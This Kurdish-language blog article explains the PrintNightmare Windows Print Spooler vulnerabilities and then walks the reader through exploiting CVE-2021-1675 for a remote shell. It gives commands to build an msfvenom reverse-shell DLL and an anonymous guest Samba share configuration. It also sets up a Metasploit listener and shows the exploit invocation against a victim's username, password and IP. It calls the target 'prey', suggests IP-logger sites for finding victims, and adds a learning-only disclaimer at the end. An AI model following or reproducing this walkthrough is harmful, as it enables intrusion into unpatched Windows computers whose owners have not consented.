ئایا PrintNightmare چییە؟!

بریتییە لە یەکێک لە هەرە ترسناکترین هەڵە سایبەریەکان کە دووچاری وەگەڕخەری ویندۆوس بۆتەوە لە سەرەتاکانی ئەمساڵ ، ئەم هەڵەیە لە ناو دەروازەی خزمەتگوزاریەکانی Print Spooler ڕوو ئەدا کە دوو جۆری جیاوازی هەیە ، کە یەکێکیان ئەبێتە هۆی ڕوودانی هەڵەی Remote Code Execution کە لە سیستەمی جیهانی CVE ـــــی ناساندن و پێناسەکردنی هەڵە لە سیستمەکاندا بە CVE-2021-34527 پێناسەکراوە ، و دووەمینیان بریتییە لە زۆربوونی دەسەڵات Privilege Escalation کە ئەمیشیان لە سیستەمی CVE ــــدا بە ناسنامەی CVE-2021-1675 ناسێندراوە.

 

دوا بودوای سەرهەڵدانی ئەم هەڵەیە ، لە بەرواری ٦ پوشپەڕی ساڵی ٢٠٢١ گەورە کۆمپانیای مایکرۆسۆفت نوێکردنەوەیەکی چاوەڕوان نەکراو Out-of-bandــــی ئاراستەی بەکارهێنەرانی ویندۆوس و وینۆوس سێرڤەر کرد بۆ ناساندی ئەم هەڵەیە لە نێو وەگەڕخەری ویندۆوس و پاراستنی بەکارهێنەران لەم دوو هەڵە سایبەرییە ترسناکە ، بەلام بەهۆی خێرا بڵاوبوونەوەی کەلێنەکان کۆمپانیای ناوبراو دەستبەجێ و بە شێوەیەکی هەڕەمەکی هەڵسا بە ناردنی نوێکاری بۆ هەریەک لە وەشانەکانی Windows 7 و ڕاژەی Windows 2012 بەڵام ئەم نوێکاریە چاوەڕوان نەکراوەی مایکرۆسۆفت بووە هۆی لەکارکەوتنی بەشێک لە چاپکەرەکاندا و سەرەڕاو ئەوەش لێکۆلەرانی بواری ئاساییشی ئینتەرنێتی تێبینی ئەوەیان کرد کە ئەم نوێکاریە خێرایەی مایکرۆسۆفت چارەسەری تەواوی کێشەکەی نەکردووە ، ئەمەش لە کاتێکدا کە ئەو نوێکاریە تەنیا ڕێگری لەوە ئەکرد کە جگە لە هەژماری Adminstrator کە بە مانایەکی تر دەسەڵاتی root دێ کەسی تر نەتوانێ درایڤەری چاپکەرەکان لەسەر Windows Print Server دابمەزرێنێ یاخوود بەکاریان بهێنێت کە وا دانرابوو هەر هەژمارێ دەسەڵاتی ئەدمینی نەبێ ڕێگەی پێ نەدرێ درایڤەری چاپکەرەکان لەسەر وەگەڕخەرەکان جێگیر بکا واتە ئەو هەژمارانەی کە دەسەڵاتی root یان نییە وەک بەشێک لەم دوو هەڵەیە حسابیان بۆ کرابوو  لە نوێکاریەکانی مایکرۆسۆفتدا بۆیە دەسەڵاتی بەکارهێنەری ئاسایی کەمکرابوونەوە لەم نوێکاریانەدا.

 

شایەنی باسە کە ئەو هەڵانە لەلایەن ڕێکخراوی Sangforــــەوە دۆزراونەتەوە و لە ئەنجامی هەلەیەکی تەکنیکی بۆ سەلماندنی هەڵەکە بۆ کۆمپانیای پەیوەندیدار هەڵەکەیان بە شێوازێکی نەخوازراو لە Githubــــدا بڵاوکردبوویەوە بە شێوەی Public کە هەر کەسێ ئەیتوانی دەستی بە هەلەکە بگات ، دوای وریابوونەوەیان هەر خێرا لە گیتهەبی خۆیان سڕیبوویانەوە ، بەلام لە کاتێکدا کە چەندان کەس هەلەکەیان بەدەست خستبوو ، هەر بۆیەش چەندان کۆپی لە ئینتەرنێتدا بڵاوکرانەوە.

 

 

چۆن شێڵ بەدەست بێنم بەبەکارهێنانی ئەم هەڵەیە؟!

 

لێرەدا پەندێکی پێشینانم بیر کەوتەوە کە ئەڵێ “کاتێک شێر لەوێ نەبێ کەریش پاشایە” بگومان ئەو پەندە زۆر لەگەل ئەو پرسیارەمان لێک ئەگرێتەوە چونکە دیارە کە تەواوی ئەو هاککەرانەی ئێستا بەربوونەتە گیانی سیستمەکان و خەریکی وێرانکارین هەمووی لەسەر حسابی هاککەرانی پێش خۆیانە چونکە هیچ سیستەمێک هاک ناکرێ ئیلا کەلێنێکی هەبێ ، کە خۆشبەختانەش زۆربەی هەرە زۆری ئەو کەلێنانەی کە هاککەرە گەورەکان ئەیدۆزنەوە لەسەر سیستمەکان لە ئینتەرنێتا بلاوئەکرێنەوە کە لە دوای خۆیانەوە چەندان کاری چاکە و خراپەی پێ ئەنجام ئەدرێ لەلایەن مشەخۆرانی ترەوە کە ئێستا بە هاککەر ناوزەد ئەکرێن!

 

ئێستا با بێین و باس لەوە بکەین کە چۆن ئەتوانرێ دەست بەسەر وەگەڕخەری ویندۆوسدا بگیرێ بەبەکارهێنانی ئەم هەڵەیە:

بێگومان هەر وەک لە سەرەوە باسم کرد زۆربەی کەلێنەکان لە ئینتەرنێتا بە ئامادەکراوی ئەخرێنە بەردەست مشەخۆران و خۆشبەختانە ئەم کەلێنەش یەکێکە لەو کەلێنانە کە ئەتوانین لە ئینتەرنێتدا بەدەستی بێنین (کلیک بکە!).

 

هەنگاوی یەکەم: سەرەتا پێویستە ئاگاداربین کە پێویستمان بە دابەشکراوەیەکی لینۆکسە بۆ ئاسانکردنی کارەکانمان ، دوای ئەوەی کە ئەم پارچە دەست نووسەی نێو ئەو بەستەرەی سەرەوەمان کۆپی کرد و خستمانە نێو فایلێک بە پاشگری .py پاشەکەوتمان کرد ، دەست ئەکەین بە دروستکردنی پەیلۆدێک بۆ نێچیرەکەمان کە ئەمەش بە چەندان جۆر ئەکرێ ، کە یەکێک لە ئاسانترین ڕێگاکان بەکارهێنانی ئامرازی msfvenomـــــە کە بە شێوەیەکی بنچینەیی لەسەر زۆربەی دابەشکراوەکانی لینۆکس هەیە بەتایبەت ئەوانەی کە بۆ ئیشی لێکۆلینەوە و پاراستن بەکار دەهێندرێن لەوانە (Kali – Parrot – RedHat …etc) بەلام گەر یەکێک نەبیت لە بەکارهێنەرانی ئەم دابەشکراوانە ئەتوانیت بەم فرمانە دایبمەزرێنیت:

  • sudo apt install metasploit-framework

دوای ئەم کردارە دەست ئەکەین بە دروستکردنی ئامرازەکە بەم فرمانەی خوارەوە:

  • msfvenom  -f dll -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -o reverseshell.dll

 

پاشان دەست ئەکەین بە گواستنەوەی پەیلۆدەکەمان بۆ بوخچەی temp بەم فرمانەی خوارەوە ، ئاگاداربە ئەم هەنگاوە دڵخوازانەیە و ئەتوانی ئەنجامی نەدەی ، ئێمە بۆیە ئەم کردارە ئەنجام ئەدەین بۆ ئەوەی هیچ شوێن پێیەک لە دوای خۆمان بەجێ نەمێنێ و هەمووی لەناو بچێ لەدوای کوژاندنەوەی وەگەڕخەری لینۆکسەکەمان:

  • cp reverse.dll /tmp

هەنگاوی دووەم: دوای ئەوەی ئەوەمان کرد دەست ئەکەین بە ڕێکخستنی ڕاژەی SMB لەسەر وەگەرخەری لینۆکسەکەمان بەم فرمانەی خواروە فایلێکی بۆ ئەکەینەوە

  • sudo nano /etc/samba/smb.conf

دوای ئەوە ئەم پارچە کۆدە ئەخەینە نێو فایلەکەوە:

 [global]
     map to guest = Bad User
     server role = standalone server
     usershare allow guests = yes
     idmap config * : backend = tdb
     smb ports = 445
  
 [smb]
     comment = Samba
     path = /tmp/
     guest ok = yes
     read only = no
     browsable = yes
     force user = smbuser

دوای ئەوە دەست ئەکەین بە داگیرساندی خزمەتگوزاریەکانی ڕاژەی SMB بەم پارچە فرمانەی خوارەوە:

  • sudo service smbd restart 

هەنگاوی سێیەم: دوای ئەنجامدانی هەر یەک لەم فرمانانەی پێویستە جوێگرێک دابنێن بۆ ئەوەی کاتێ نێچیرەکە کەوتە تەلەکەوە جوێگرەکە شێڵمان بۆ بکاتەوە لەسەر کۆمپیەتەری ئەم کەسە یان سێرڤەرە بۆ ئەمەش ئامرازی msfconsole بەکار دێنین هەر ڕاستەوخۆ بۆ بەکارهێنانی ئامرازەکە لە تێرمیناڵ بنووسە msfconsole و چاوەڕێ بکە تا ئەیکاتەوە دواتر دەست ئەکەین بە ڕێکخستنی جوێگر بەم فرمانەی خوارەوە:

  • use exploit/multi/handler

ئینجا هەمان ئەو پەیلۆدە ئەدەین بە جوێگر کە پێشوتر بەکارمان بردووە لەسەرەوە بۆ ئەمەش ئەم فرمانەی خوارەوە ئەنووسین:

  • set PAYLOAD windows/x64/shell_reverse_tcp

دوای ئەوەش دەبێ ئایپی وەگەڕخەری لینۆکسەکەمان بدەین بە جوێگرەکە ، بۆ زانینی ئایپی وەگەڕخەرەکەت لە تێرمیناڵ ئەم فرمانەی خوارەوە بنووسە:

  • ifconfig wlan0 | grep inet

دوای ئەوەی ئایپیەکەت دەرهێنا بڕۆوە سەر پەڕەی msfconsole و ئەم فرمانە بنووسە:

  • set LHOST your_IP_address

پاشان دەبێ دەرچە PORT ێک بدەین بە جوێگر تا لەڕێیەوە پەیوەندی بگرێت لەگەل پەیلۆدەکە لەو کاتەی کە لەسەر کۆمپیوتەری نێچیرەکەمان جێگیر کراوە کە ئەمەش بەم فرمانەی خوارەوە ئەکرێ:

  • set LPORT 4444

ئاگاداربە هەر پۆرتێکت بەکار هێنابێ بۆ دروستکردنی پەیلۆدەکە پێویستە هەمان پۆرت بدەیت بەجوێگر ئەگەر نا هیچ پەیوەندیەک دروستنابێ لە نێوان تۆ و نێچیرەکە!

 

دوای ئەوەی ئەم کردارانەمان جێبەجێ کرد دواجار پێویستە فرمان بە جوێگر بکەین کە بەو زانیاریانەی پێمان داوە جوێبگرێ بۆ هەر پاکەتێک کە بۆ ئەو ئایپی و پۆرتە دێت و ئەڕوا ئەمەش بە یەکێک لەو دوو فرمانە ئەنجام ئەدرێ کە بریتین لە (exploit / run) ئاگاداربە هەردووکی پێکەوە بەکار مەبە بە ئارەزووی خۆت دانەیەک ئەتوانی بەکار بێنیت!

 

هەنگاوی چوارەم: دوای ئەوەی ئەم کردارانەی سەرەوەمان جێبەجێ کرد دەست ئەکەین بە بەکارهێنانی ئەو exploit ــــەی کە لە هەنگاوی یەکەم دامانبەزاندبوو بۆ ئەوەی پەیلۆدەکەی پێ بنێرینە نێو کۆمپیەتەری نێچیرەکە ئەمەش لە ڕێگای ئەم فرمانەی خوارەوە ئەکرێ:

  • sudo python3 CVE-2021-1675.py VICTIM’s_computer_Username:VICTIM’s_Computer_Pass@VICTIM’s_IP\\YOUR_IP\smb\reverse.dll

لێرەدا بۆمان دەرئەکەوێ کە پێویستە سەرەتا چەند زانیاریەکمان هەبێ سەبارەت بە کۆمپیوتەری نێچیرەکەمان کە بریتین لە (ناوی هەژماری کۆمپیەتەرەکەی – پاسوۆردی هەژماری کۆمپیوتەرەکەی – ئایپی کۆمپیەتەرەکەی) ئەمەش زۆر ئاسانە کە ئەتوانرێ بە وێبسایتی Grabify یان IPlogger یان بە هەر شێوازێک بێ بەدەست بهێندرێ ، دوای جێبەجێکردنی ئەم فرمانەی سەرەوە سەیری پەڕەی جوێگری سەر تێرمیناڵەکەت بکە ئەبینیت کە شێڵت بۆ کراوەتەوە لەسەر کۆمپیوتەری نێچیرەکەت.

 

لەکۆتاییدا پێم خۆشە بڵێم کە: ئەم بابەتە تانیا بۆ مەبەستی فێربوون باسی لێوە کراوە و نە من نە هیچ ئەندامێکی ماڵپەڕی تێک ئای بەرپرس نییە لە هیچ کار و کردەوەیەک کە بەهۆی ئەم بابەتەوە ڕوو بدا و ئامنجامان تەنیا فێربوونە بۆ خۆپاراستن ، هەرچەند لە ئێستادا ئەم ئێکسپلۆیتە لەسەر کۆتا وەشانی وەگەڕخەری ویندۆوس کار ناکا و تەنیا لەسەر وەشانە کۆنەکان کار ئەکا بەلام بەداخەوە کە ئێستاش زۆربەی کۆمپیوتەری تاکی کورد هەر ویندۆوس ٧ یان لەسەرە ، بەڵام هەروەک پێشینانمان وتوویانە “کەر هەر کەرە گەر بیبەیتە بەغداش” بێگومان مەبەستم بێڕێزیکردن نییە بە هیچ تاکێک تەنیا مەبەستم ئەوەیە کە هەر کەسێ نیازی کاری خراپی هەبێ ئەوا ئەڕوات و فێرئەبێ چ لێرە یاخوود لە هەر شوێنێکی تربێ…

هەموو ماڵپەر و دەزگایەكی ڕاگەیاندن ئازادە لە بڵاو كردنەوەی بابەتەكانی ماڵپەری تێك ئای، بەمەرجێك ئاماژەی بە سەرچاوەكە بكات

شەیر بكە بۆ هاوڕێیانت

دەربارەی نوسەر

Reverse Engineer | Pentester | Web Developer | Programmer

Comments are closed.